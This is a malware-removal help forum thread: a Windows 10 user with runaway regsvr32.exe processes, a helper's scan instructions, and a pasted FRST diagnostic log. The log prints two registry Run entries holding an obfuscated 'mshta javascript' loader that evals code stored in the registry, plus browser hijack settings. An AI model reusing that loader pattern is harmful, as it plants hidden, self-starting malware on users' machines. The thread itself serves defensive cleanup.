Regsvr32.exe, running at 25-40% cpu usage and computer is really slow.


  • This topic is locked

#1
jake1master

  • Member
  • 10 posts

So I have had no previous problems. My brother gave me a computer that had Symantec and I removed it because it was taking up my CPU as it was. So I switched to Windows Defender (I'm on Windows 10) and I've had it for a month now. I have had no problems with it until yesterday my computer became really slow. I ran a defrag, and ran a virus scan through Windows Defender and they are still currently running. But there is a new process that I've never seen before, named regsvr32.exe; it is taking up a lot of my memory and CPU to the point where my computer is very slow! I did some research on the process and it claims to be one direct from Microsoft claiming that I require updates... I installed updates just 30 minutes ago and it is still there! I just took another look and there are now 3 processes claiming to be regsvr32.exe! I have no idea what I'm supposed to do!




#2
BrianDrab

    Trusted Helper

  • Malware Removal
  • 3,591 posts

Hi. My name is Brian, and I would be happy to look into your issue.
 


- General Instructions -

  • Please read all instructions and fixes thoroughly. Read the ENTIRE post BEFORE performing any steps so you understand all that needs to be done.
  • I would advise printing any instructions for easy reference as some of the fixes may require you to boot in Safe mode. Access to these instructions may not be available in Safe Mode.
  • Any fixes provided by myself are for this log file only and should not be used on any other systems.
  • Do not run any other removal software or perform updates other than the ones I provide, as it will complicate the cleaning process.
  • It's very likely that part of our cleanup will include emptying your recycle bin. If you use your recycle bin as an archive and do not wish this to be emptied, please let me know.
  • It is also likely during our cleaning process that your internet browsing history will be removed. Your favorites will be untouched. If you don't want this to happen you need to let me know before running any steps so I can adjust my fixes accordingly.
  • You have 4 days to reply to each post or the topic will be closed. You will be able to request that the topic be re-opened by sending me a PM (Personal Message) or PM a moderator.
  • Please feel free to ask any questions, especially if you are having problems with my instructions.


- Save ALL Tools to your Desktop-

 

All tools that I have you download should be placed on the desktop unless otherwise stated. If you are familiar with how to save files to the desktop then you can skip this step.
 
Since you are continuing with this step then I assume you are unfamiliar with saving files to your desktop. As a result it's easiest if you configure your browser(s) to download any tools to the desktop by default. Please use the appropriate instructions below depending on the browser you are using.
  • Google Chrome - Click the "Customize and control Google Chrome" button in the upper-right corner of the browser. Choose Settings. At the bottom of the screen, click the "Show advanced settings..." link. Scroll down to find the Downloads section and click the Change... button. Select your desktop and click OK.
  • Mozilla Firefox - Click the "Open Menu" button in the upper-right corner of the browser. Choose Options. In the Downloads section, click the Browse button, click on the Desktop folder and then click the "Select Folder" button. Click OK to get out of the Options menu.
  • Internet Explorer - Click the Tools menu in the upper-right corner of the browser. Select View downloads. Select the Options link in the lower left of the window. Click Browse and select the Desktop and then choose the Select Folder button. Click OK to get out of the download options screen and then click Close to get out of the View Downloads screen.
NOTE: IE8 does not support changing download locations in this manner. You will need to download the tool(s) to the default folder, usually Downloads, then copy them to the desktop.
 

- Finally Before We Start-

 
Removing malware is a complicated, multiple-step process. Please stay with me until I have declared your system clean. I strongly recommend you back up your personal files and folders. Although rare, attempting to remove malware can render your machine unbootable or cause data loss. Having backups of your data is your responsibility. Your security programs may give warnings for some of the tools I will ask you to use. Be assured, any links I give are safe.

 

 

 

Let's take a look to see what is going on. Please provide logs.

 

Fresh Set of Logs Needed
 
1. Please download Farbar Recovery Scan Tool and save it to your Desktop.
    Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them.
    Only one of them will run on your system, that will be the right version.
2. Right click on the file and select Run as administrator (If you don't have this option simply double-click the file to open). When the tool opens click Yes to disclaimer.
3. Press Scan button.
4. It will produce a log called FRST.txt in the same directory the tool is run from (which should be the desktop).
5. Please copy and paste the log back here.
6. The first time the tool is run it generates another log (Addition.txt - also located in the same directory as FRST.exe). Please also paste that along with the FRST.txt into your reply.
     Note: Please do not attach any logs unless specifically requested. It's easier if you simply copy and paste them into your reply. It's OK if you have to use more than one post to do so.

 



#3
jake1master

  • Topic Starter
  • Member
  • 10 posts

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:09-12-2015
Ran by PimpSlap (administrator) on PIMPSLAP-PC (10-12-2015 17:25:42)
Running from C:\Users\PimpSlap\Desktop
Loaded Profiles: PimpSlap (Available Profiles: PimpSlap)
Platform: Windows 10 Pro (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(AMD) C:\Windows\System32\atiesrxx.exe
(Advanced Micro Devices, Inc.) C:\Program Files\AMD\ATI.ACE\Fuel\Fuel.Service.exe
(Advanced Micro Devices) C:\Program Files\AMD\{920DEC42-4CA5-4d1d-9487-67BE645CDDFC}\amdacpusrsvc.exe
(Paramount Software UK Ltd) C:\Program Files\Macrium\Reflect\ReflectService.exe
() C:\Windows\System32\PnkBstrA.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Pixart Imaging Inc) C:\Windows\System32\TiltWheelMouse.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(© 2015 Microsoft Corporation) C:\Users\PimpSlap\AppData\Local\Microsoft\BingSvc\BingSvc.exe
(Renesas Electronics Corporation) C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\AMD\ATI.ACE\Core-Static\MOM.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\AMD\ATI.ACE\Core-Static\CCC.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.10240.16565_none_1162030161f5c19b\TiWorker.exe
(Microsoft Corporation) C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCui.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\Taskmgr.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [MouseDriver] => C:\WINDOWS\system32\TiltWheelMouse.exe [241152 2012-12-19] (Pixart Imaging Inc)
HKLM\...\Run: [XboxStat] => C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe [825184 2009-09-30] (Microsoft Corporation)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [446392 2012-04-04] (Adobe Systems Incorporated)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [14021336 2015-06-18] (Realtek Semiconductor)
HKLM-x32\...\Run: [NUSB3MON] => C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe [115048 2011-09-15] (Renesas Electronics Corporation)
HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\AMD\ATI.ACE\Core-Static\amd64\CLIStart.exe [767176 2015-10-12] (Advanced Micro Devices, Inc.)
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [BingSvc] => C:\Users\PimpSlap\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2015-11-11] (© 2015 Microsoft Corporation)
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [DAEMON Tools Lite] => C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe [3696912 2014-03-04] (Disc Soft Ltd)
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [GoogleChromeAutoLaunch_F884F1D7BC4601607AB3C7CEE5F5A322] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [741704 2015-12-04] (Google Inc.)
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [EADM] => C:\Program Files (x86)\Origin\Origin.exe [3638768 2015-12-01] (Electronic Arts)
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [57981568 2015-09-27] (Skype Technologies S.A.)
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [MyComGames] => C:\Users\PimpSlap\AppData\Local\MyComGames\MyComGames.exe [4235208 2015-10-21] (MY.COM B.V.)
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3013200 2015-12-08] (Valve Corporation)
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [Razer Comms] => C:\Program Files (x86)\Razer\Comms\RazerComms.exe [7010112 2015-10-15] () <===== ATTENTION
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [WindApp] => "C:\Users\PimpSlap\AppData\Roaming\Store\WindApp\WindApp.exe" /winstartup
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [Selection Tools] => "C:\Users\PimpSlap\AppData\Roaming\WTools\Selection Tools\Selection Tools.exe" /winstartup
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [**bfa63c00<*>] => mshta javascript:tg5Av9BK="F7FU0VZ6tm";Q2k=new%20ActiveXObject("WScript.Shell");TvtxAYj0="5EsUzy";nTa5r6=Q2k.RegRead("HKCU\\software\\a5b384e525\\7c6671cf");MLUFn3l="dr9X";eval(nTa5r6);sKu0ZwI="RwVzRS (the data entry has 4 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [**10548e12<*>] => mshta javascript:aRV1SL8ci="1Vhox";U1z3=new%20ActiveXObject("WScript.Shell");Kc5EZWrY="10ceYvbH";O4eIG=U1z3.RegRead("HKCU\\software\\a5b384e525\\7c6671cf");pN6ujpZ6iw="cw";eval(O4eIG);jrwYec53i="SGxNZ (the data entry has 4 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\RunOnce: [Uninstall C:\Users\PimpSlap\AppData\Local\Microsoft\OneDrive\17.3.5892.0626\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\PimpSlap\AppData\Local\Microsoft\OneDrive\17.3.5892.0626\amd64"
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\RunOnce: [Uninstall C:\Users\PimpSlap\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\PimpSlap\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64"
HKU\S-1-5-18\...\RunOnce: [AOD] => C:\Program Files\AMD\ATI.ACE\Fuel\Fuel.Service.exe [344064 2015-06-22] (Advanced Micro Devices, Inc.)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\..\Interfaces\{6335a133-9766-455d-bbee-4cc54756b9d4}: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{94b8a640-46be-4b3a-a238-e90e0be2bb84}: [NameServer] 75.75.75.75,75.75.76.76
 
Internet Explorer:
==================
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/enterprise/security_response/index.jsp?inid=biz_SR_sep_V12_1_MR_6
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=5.5&ar=msnhome
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/enterprise/security_response/index.jsp?inid=biz_SR_sep_V12_1_MR_6
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=5.5&ar=msnhome
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://search.msn.com/spbasic.htm
HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/enterprise/security_response/index.jsp?inid=biz_SR_sep_V12_1_MR_6
HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=5.5&ar=msnhome
HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://search.msn.com/spbasic.htm
HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/enterprise/security_response/index.jsp?inid=biz_SR_sep_V12_1_MR_6
HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=5.5&ar=msnhome
HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://search.msn.com/spbasic.htm
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/enterprise/security_response/index.jsp?inid=biz_SR_sep_V12_1_MR_6
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=5.5&ar=msnhome
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://search.msn.com/spbasic.htm
SearchScopes: HKU\S-1-5-21-1710800545-2821560886-2955275411-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www-searching.com/search.aspx?s=FB1zamobl03687,6948c77b-0cfd-43cf-98e1-8e5b9952202f&site=shyosie&prd=set&q={searchTerms}
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_25\bin\ssv.dll [2014-11-25] (Oracle Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_25\bin\jp2ssv.dll [2014-11-25] (Oracle Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\ssv.dll [2014-11-28] (Oracle Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\jp2ssv.dll [2014-11-28] (Oracle Corporation)
DPF: HKLM-x32 {B479199A-1242-4E3C-AD81-7F0DF801B4AE} hxxp://download.microsoft.com/download/C/9/C/C9C3D86D-84AC-4AF0-8584-842756A66467/MicrosoftDownloadManager.cab
 
FireFox:
========
FF ProfilePath: C:\Users\PimpSlap\AppData\Roaming\Mozilla\Firefox\Profiles\7ugsozrc.default
FF DefaultSearchEngine: Bing 
FF SearchEngineOrder.3: Bing 
FF SelectedSearchEngine: Bing 
FF Homepage: hxxp://www-searching.com/?site=shyosffdefault&prd=set&s=FB1zamobl03687,6948c77b-0cfd-43cf-98e1-8e5b9952202f
FF Keyword.URL: hxxp://www.bing.com/search?FORM=SK2JDF&PC=SK2J&q=
FF NewTab: hxxp://www-searching.com/?site=shyosffdefault&prd=set&s=FB1zamobl03687,6948c77b-0cfd-43cf-98e1-8e5b9952202f
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_18_0_0_232.dll [2015-08-19] ()
FF Plugin: @esn/npbattlelog,version=2.7.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.7.1\npbattlelogx64.dll [2015-04-30] (EA Digital Illusions CE AB)
FF Plugin: @java.com/DTPlugin,version=11.25.2 -> C:\Program Files\Java\jre1.8.0_25\bin\dtplugin\npDeployJava1.dll [2014-11-25] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.25.2 -> C:\Program Files\Java\jre1.8.0_25\bin\plugin2\npjp2.dll [2014-11-25] (Oracle Corporation)
FF Plugin: @videolan.org/vlc,version=2.0.5 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2012-12-16] (VideoLAN)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_232.dll [2015-08-19] ()
FF Plugin-x32: @esn/npbattlelog,version=2.7.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.7.1\npbattlelog.dll [2015-04-30] (EA Digital Illusions CE AB)
FF Plugin-x32: @java.com/DTPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\dtplugin\npDeployJava1.dll [2014-11-28] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\plugin2\npjp2.dll [2014-11-28] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-03] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-03] (Google Inc.)
FF Plugin HKU\S-1-5-21-1710800545-2821560886-2955275411-1000: @my.com/Games -> C:\Users\PimpSlap\AppData\Local\MyComGames\NPMyComDetector.dll [2015-09-17] (My.com, Inc)
FF Plugin HKU\S-1-5-21-1710800545-2821560886-2955275411-1000: @nsroblox.roblox.com/launcher -> C:\Program Files (x86)\Roblox\Versions\version-80d6e12d52f3422b\\NPRobloxProxy.dll [2012-12-31] ( ROBLOX Corporation)
FF Plugin HKU\S-1-5-21-1710800545-2821560886-2955275411-1000: @nsroblox.roblox.com/launcher64 -> C:\Program Files (x86)\Roblox\Versions\version-80d6e12d52f3422b\\NPRobloxProxy64.dll [2012-12-31] ( ROBLOX Corporation)
FF Plugin HKU\S-1-5-21-1710800545-2821560886-2955275411-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\PimpSlap\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-06-08] (Unity Technologies ApS)
FF SearchPlugin: C:\Users\PimpSlap\AppData\Roaming\Mozilla\Firefox\Profiles\7ugsozrc.default\searchplugins\bingp.xml [2015-07-16]
FF SearchPlugin: C:\Users\PimpSlap\AppData\Roaming\Mozilla\Firefox\Profiles\7ugsozrc.default\searchplugins\smod.xml [2015-11-01]
FF Extension: No Name - C:\Users\PimpSlap\AppData\Roaming\Mozilla\Firefox\Profiles\7ugsozrc.default\extensions\[email protected] [not found]
 
Chrome: 
=======
CHR HomePage: Default -> msn.com/?pc=__PARAM__&ocid=__PARAM__DHP&osmkt=en-us
CHR StartupUrls: Default -> "hxxp://google.com/"
CHR Profile: C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-08-11]
CHR Extension: (Assassin's Creed IV Black Flag) - C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Extensions\agibflpbghgmiinfaefgnldmfajdance [2015-10-12]
CHR Extension: (Google Docs) - C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-08-11]
CHR Extension: (Google Drive) - C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-20]
CHR Extension: (YouTube) - C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-26]
CHR Extension: (Google Search) - C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-26]
CHR Extension: (Tampermonkey) - C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Extensions\dhdgffkkebhmkfjojejmpbldmpobfkfo [2015-11-17]
CHR Extension: (User-Agent Switcher for Chrome) - C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Extensions\djflhoibgkdhkhhcedjiklpkjnoahfmg [2015-11-01]
CHR Extension: (ZenMate Security, Privacy & Unblock VPN) - C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Extensions\fdcgdnkidjaadafnichfpabhfomcebme [2015-12-09]
CHR Extension: (Google Sheets) - C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-08-11]
CHR Extension: (Heroes & Generals) - C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbophcdhblbipoaacgchllkobdaolpge [2015-11-27]
CHR Extension: (Google Docs Offline) - C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-17]
CHR Extension: (AdBlock) - C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2015-12-03]
CHR Extension: (AgarioMods Evergreen Script) - C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhjgdbihpkphlammdaeicdemggagfbdo [2015-09-18]
CHR Extension: (Chrome Web Store Payments) - C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-08-11]
CHR Extension: (Gmail) - C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-08-11]
CHR HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fcfenmboojpjinhpgggodefccipikbpd] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [jlcgehabolcakkjhgmgpkagpolbjlhfa] - hxxps://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AMD FUEL Service; C:\Program Files\AMD\ATI.ACE\Fuel\Fuel.Service.exe [344064 2015-06-22] (Advanced Micro Devices, Inc.) [File not signed]
R2 amdacpusrsvc; C:\Program Files\AMD\{920DEC42-4CA5-4d1d-9487-67BE645CDDFC}\amdacpusrsvc.exe [121856 2015-10-12] (Advanced Micro Devices) [File not signed]
S4 Beard; C:\Program Files (x86)\Steam\SteamApps\common\SpaceEngineers\DedicatedServer64\SpaceEngineersDedicated.exe [64512 2015-12-06] (Keen Software House) [File not signed]
S2 Boot Fook; C:\Program Files (x86)\Steam\SteamApps\common\SpaceEngineers\DedicatedServer64\SpaceEngineersDedicated.exe [64512 2015-12-06] (Keen Software House) [File not signed]
S3 EasyAntiCheat; C:\WINDOWS\SysWOW64\EasyAntiCheat.exe [245544 2015-09-03] (EasyAntiCheat Ltd)
S2 Lol; C:\Program Files (x86)\Steam\SteamApps\common\SpaceEngineers\DedicatedServer64\SpaceEngineersDedicated.exe [64512 2015-12-06] (Keen Software House) [File not signed]
S2 NewServer; C:\Program Files (x86)\Steam\SteamApps\common\SpaceEngineers\DedicatedServer64\SpaceEngineersDedicated.exe [64512 2015-12-06] (Keen Software House) [File not signed]
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2104840 2015-12-01] (Electronic Arts)
R2 PnkBstrA; C:\Windows\system32\PnkBstrA.exe [76152 2015-08-11] ()
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76888 2015-08-11] ()
S2 Razer Game Scanner Service; C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [188072 2015-09-23] ()
R2 ReflectService.exe; C:\Program Files\Macrium\Reflect\ReflectService.exe [3446224 2015-02-23] (Paramount Software UK Ltd)
S4 RzKLService; C:\Program Files (x86)\Razer\Razer Cortex\RzKLService.exe [129168 2015-07-14] (Razer Inc.)
S2 Test; C:\Program Files (x86)\Steam\SteamApps\common\SpaceEngineers\DedicatedServer64\SpaceEngineersDedicated.exe [64512 2015-12-06] (Keen Software House) [File not signed]
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-09] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-09] (Microsoft Corporation)
S2 NetTcpHandler; C:\Users\PimpSlap\AppData\Roaming\NetService\netservice.exe -start [X]
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 amdacpksd; C:\WINDOWS\system32\drivers\amdacpksd.sys [297672 2015-10-12] (Advanced Micro Devices)
S0 amdkmafd; C:\Windows\System32\drivers\amdkmafd.sys [40720 2015-07-28] (Advanced Micro Devices, Inc.)
R2 AODDriver4.3; C:\Program Files\AMD\ATI.ACE\Fuel\amd64\AODDriver2.sys [59616 2014-02-11] (Advanced Micro Devices)
R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdWT6.sys [102912 2015-10-11] (Advanced Micro Devices)
R1 dtsoftbus01; C:\Windows\System32\drivers\dtsoftbus01.sys [283064 2015-02-01] (Disc Soft Ltd)
R3 ElcMouLFlt; C:\Windows\System32\drivers\ElcMouLFlt.sys [28648 2015-10-25] (ELECOM)
R3 ElcMouUFlt; C:\Windows\System32\drivers\ElcMouUFlt.sys [27624 2015-10-25] (ELECOM)
R1 HWiNFO32; C:\Windows\system32\drivers\HWiNFO64A.SYS [27552 2015-09-19] (REALiX™)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [587264 2015-06-17] (Realtek                                            )
R2 rzpmgrk; C:\WINDOWS\system32\drivers\rzpmgrk.sys [37184 2015-09-22] (Razer, Inc.)
R2 rzpnk; C:\WINDOWS\system32\drivers\rzpnk.sys [129472 2015-09-08] (Razer, Inc.)
S3 SWDUMon; C:\Windows\System32\DRIVERS\SWDUMon.sys [16056 2015-03-23] (SlimWare Utilities, Inc.)
R3 t_mouse.sys; C:\Windows\system32\DRIVERS\t_mouse.sys [6144 2012-12-19] ()
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-09] ()
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2015-06-10] (Apple, Inc.) [File not signed]
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44568 2015-07-09] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [291680 2015-07-09] (Microsoft Corporation)
